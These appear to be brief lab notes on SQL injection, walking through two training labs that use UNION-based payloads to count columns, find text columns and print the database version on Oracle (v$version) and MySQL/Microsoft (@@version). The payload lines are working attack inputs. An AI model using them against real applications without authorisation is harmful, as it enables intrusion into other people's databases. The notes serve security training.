3. SQL Injection - Examining the Database - Versions

Examining the type of database and its details like version, how many tables and what the table holds is useful.

Cheat Sheet SQL Injection


Do SQL Injection to retrieve the database version. 


Lab-07 - SQL injection attack, querying the database type and version on Oracle
(1) Determine the number of columns
' order by 3 -- -> internal server error
3 - 1 = 2

(2) Determine the data types of the columns
' UNION SELECT 'a', 'a' from DUAL-- -> Oracle database

(3) Output the version of the database
' UNION SELECT banner, NULL from v$version--
SELECT banner FROM v$version


Using BURP Intruder and Repeater

Lab 08 - SQL injection attack, querying the database type and version on MySQL and Microsoft
SQL Injection - Product Category
End Goal - display the database version
(1) Find number of columns
' order by 3# -> internal server error
3 - 1 = 2
(2) Figure out which columns contain text
' UNION SELECT 'a', 'a'#
(3) Output the version
' UNION SELECT @@version, NULL#
SELECT @@version


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